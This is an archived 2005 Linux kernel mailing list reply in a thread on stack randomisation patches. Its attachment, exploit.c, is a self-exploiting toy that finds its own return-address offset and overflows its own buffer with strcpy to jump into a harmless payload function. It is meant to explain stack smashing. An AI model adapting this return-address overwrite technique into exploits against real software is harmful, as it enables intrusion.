From: John Richard Moser <nigelenki@comcast.net>
To: Arjan van de Ven <arjan@infradead.org>
Cc: linux-os@analogic.com,
Linux kernel <linux-kernel@vger.kernel.org>,
akpm@osdl.org
Subject: Re: Patch 4/6 randomize the stack pointer
Date: Thu, 27 Jan 2005 15:13:14 -0500 [thread overview]
Message-ID: <41F94B5A.2030301@comcast.net> (raw)
In-Reply-To: <1106856178.5624.128.camel@laptopd505.fenrus.org>
[-- Attachment #1.1: Type: text/plain, Size: 1171 bytes --]
In other words, no :)
Here's self-exploiting code to discover its own return address offset
and exploit itself. It'll lend some insight into how this stuff works.
Just a toy.
Arjan van de Ven wrote:
> On Thu, 2005-01-27 at 14:19 -0500, linux-os wrote:
>
>>Gentlemen,
>>
>>Isn't the return address on the stack an offset in the
>>code (.text) segment?
>>
>>How would a random stack-pointer value help? I think you would
>>need to start a program at a random offset, not the stack!
>>No stack-smasher that worked would care about the value of
>>the stack-pointer.
>
>
> the simple stack exploit works by overflowing a buffer ON THE STACK with
> a "dirty payload and then also overwriting the return address to point
> back into that buffer.
>
> (all the security guys on this list will now cringe about this over
> simplification; yes reality is more complex but lets keep the
> explenation simple for Richard)
>
> pointing back into that buffer needs the address of that buffer. That
> buffer is on the stack, which is now randomized.
>
>
>
--
All content of all messages exchanged herein are left in the
Public Domain, unless otherwise explicitly stated.
[-- Attachment #1.2: exploit.c --]
[-- Type: text/plain, Size: 1027 bytes --]
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
int payload();
int exploit(char *d);
int main() {
int distance;
char a[512] = {0};
distance = exploit(NULL);
memset(a, 0xFF, distance);
/*Get our payload address*/
*(void**)(a + distance) = &payload;
*(void**)(a + distance + sizeof(void*)) = 0; /*cap*/
/*exploit the payload*/
exploit(a);
/*we never reach this*/
return 255;
}
/*
* exploit()
* This overflows its own buffers and causes the return to jump to payload()
*/
int exploit(char *d) {
char a[400] = {0};
void *i;
int distance = 0;
char payld[sizeof(void*) + 1];
void *myret;
void *z;
if (!d) {
myret = __builtin_return_address(0);
/*find the distance between a and myret*/
for (i = (void*)a; *(void**)i != myret; i++) {
distance++;
}
return distance;
}
/*We're passed a d buffer, so strcpy it unsafely*/
strcpy(a,d);
/*Return to payload()*/
return 1;
}
int payload() {
printf("Payload executed successfully!\n");
/*0: Unsafe; successful exploit*/
_exit(0);
}
[-- Attachment #2: OpenPGP digital signature --]
[-- Type: application/pgp-signature, Size: 256 bytes --]
next prev parent reply other threads:[~2005-01-27 20:16 UTC|newest]
Thread overview: 91+ messages / expand[flat|nested] mbox.gz Atom feed top
2005-01-27 10:11 Patch 0/6 virtual address space randomisation Arjan van de Ven
2005-01-27 10:12 ` Patch 1/6 introduce sysctl Arjan van de Ven
2005-01-27 10:36 ` Andi Kleen
2005-01-27 11:13 ` Arjan van de Ven
2005-01-27 18:16 ` Pavel Machek
2005-01-27 19:11 ` Ingo Molnar
2005-01-27 19:46 ` Dave Jones
2005-01-27 19:53 ` Ingo Molnar
2005-01-27 19:53 ` Arjan van de Ven
2005-02-04 21:27 ` Benoit Boissinot
2005-01-27 10:12 ` Patch 2/6 introduce helper infrastructure Arjan van de Ven
2005-01-27 10:41 ` Andi Kleen
2005-01-27 11:58 ` Arjan van de Ven
2005-01-27 12:27 ` Andi Kleen
2005-01-27 12:43 ` Arjan van de Ven
2005-02-01 21:14 ` Matt Mackall
2005-01-27 10:12 ` Patch 3/6 per process flag Arjan van de Ven
2005-01-27 10:13 ` Patch 4/6 randomize the stack pointer Arjan van de Ven
2005-01-27 10:21 ` Christoph Hellwig
2005-01-27 17:38 ` John Richard Moser
2005-01-27 17:47 ` Arjan van de Ven
2005-01-27 18:04 ` John Richard Moser
2005-01-27 18:09 ` Arjan van de Ven
2005-01-27 18:12 ` Christoph Hellwig
2005-01-27 18:16 ` Linus Torvalds
2005-01-27 18:28 ` Linus Torvalds
2005-01-27 18:55 ` John Richard Moser
2005-01-27 18:49 ` John Richard Moser
2005-01-27 19:30 ` Linus Torvalds
2005-01-27 19:48 ` Arjan van de Ven
2005-01-27 19:59 ` Linus Torvalds
2005-01-27 20:04 ` Arjan van de Ven
2005-01-27 20:08 ` John Richard Moser
2005-01-27 19:19 ` linux-os
2005-01-27 19:52 ` Julien TINNES
2005-01-27 20:02 ` Arjan van de Ven
2005-01-27 20:13 ` John Richard Moser [this message]
2005-01-27 21:33 ` jnf
2005-01-28 17:22 ` Paulo Marques
2005-01-28 17:51 ` John Richard Moser
2005-01-28 18:42 ` Ingo Molnar
2005-01-29 6:04 ` John Richard Moser
2005-01-27 20:37 ` linux-os
2005-01-27 20:45 ` John Richard Moser
2005-01-27 21:39 ` John Richard Moser
2005-01-27 21:53 ` Arjan van de Ven
2005-01-27 22:34 ` John Richard Moser
2005-01-29 2:50 ` Rik van Riel
2005-01-29 6:31 ` John Richard Moser
2005-01-29 8:10 ` Arjan van de Ven
[not found] ` <41FBB821.3000403@comcast.net>
2005-01-29 16:42 ` Arjan van de Ven
2005-01-29 16:59 ` John Richard Moser
2005-01-29 16:46 ` Arjan van de Ven
2005-01-29 17:04 ` John Richard Moser
2005-01-29 17:37 ` Jakub Jelinek
2005-01-29 17:49 ` John Richard Moser
2005-01-29 17:55 ` Christoph Hellwig
2005-01-29 18:10 ` John Richard Moser
2005-01-29 18:12 ` Rik van Riel
2005-01-29 18:16 ` Christoph Hellwig
2005-01-29 7:46 ` John Richard Moser
2005-01-27 18:40 ` Felipe Alfaro Solana
2005-01-27 22:31 ` Jirka Kosina
2005-01-28 5:58 ` Ingo Molnar
2005-01-28 19:02 ` David Lang
2005-01-28 7:33 ` Arjan van de Ven
2005-01-27 19:43 ` Julien TINNES
2005-01-28 0:10 ` H. Peter Anvin
2005-01-28 0:23 ` Roland Dreier
2005-01-28 1:06 ` H. Peter Anvin
2005-01-28 2:03 ` Horst von Brand
2005-01-28 8:45 ` Julien TINNES
2005-01-27 20:23 ` Christoph Hellwig
2005-01-27 20:27 ` Arjan van de Ven
2005-01-27 20:32 ` Christoph Hellwig
2005-01-27 20:35 ` Arjan van de Ven
2005-01-27 20:40 ` Rik van Riel
2005-01-27 20:42 ` Christoph Hellwig
2005-01-27 20:56 ` Arjan van de Ven
2005-01-27 21:13 ` Linus Torvalds
2005-01-27 10:13 ` Patch 5/6 randomize mmap addresses Arjan van de Ven
2005-01-27 10:14 ` Patch 6/6 default enable randomisation for -mm Arjan van de Ven
2005-01-27 11:45 ` Patch 0/6 virtual address space randomisation Julien TINNES
2005-01-27 11:57 ` Arjan van de Ven
2005-01-27 17:42 ` John Richard Moser
2005-01-27 19:34 ` Julien TINNES
2005-01-27 19:57 ` John Richard Moser
2005-01-27 20:13 ` Arjan van de Ven
2005-01-28 8:45 ` David Weinehall
-- strict thread matches above, loose matches on Subject: below --
2005-01-31 10:55 Patch 4/6 randomize the stack pointer linux
2005-01-31 17:28 ` John Richard Moser
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=41F94B5A.2030301@comcast.net \
--to=nigelenki@comcast.net \
--cc=akpm@osdl.org \
--cc=arjan@infradead.org \
--cc=linux-kernel@vger.kernel.org \
--cc=linux-os@analogic.com \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox